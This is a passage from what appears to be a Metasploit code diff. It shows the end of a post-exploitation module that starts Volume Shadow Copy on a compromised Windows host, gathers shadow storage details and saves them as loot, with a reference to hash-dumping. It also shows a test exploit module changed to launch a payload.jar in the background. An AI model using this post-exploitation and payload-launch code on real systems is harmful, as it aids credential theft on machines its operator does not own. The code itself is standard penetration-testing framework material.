[ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ]
]
))
end
def run
unless is_admin?
print_error("This module requires admin privs to run")
return
end
if is_uac_enabled?
print_error("This module requires UAC to be bypassed first")
return
end
unless start_vss
return
end
storage_data = vss_get_storage
if storage_data
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Shadow Copy Storage Data',
'Indent' => 1,
'Columns' => ['Field', 'Value']
)
storage_data.each_pair{|k,v| tbl << [k,v]}
print_good(tbl.to_s)
store_loot(
'host.shadowstorage',
'text/plain',
session,
tbl.to_s,
'shadowstorage.txt',
'Shadow Copy Storage Info'
)
end
end
end

3
test/modules/exploits/test/java_tester.rb
View File

@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
fd.write(@jar_data)
end
framework.threads.spawn("Module(#{self.refname})-JavaLauncher", false) { system("java -jar payload.jar") }
pid = Process.spawn("java -jar payload.jar &")
Process.detach pid
end
end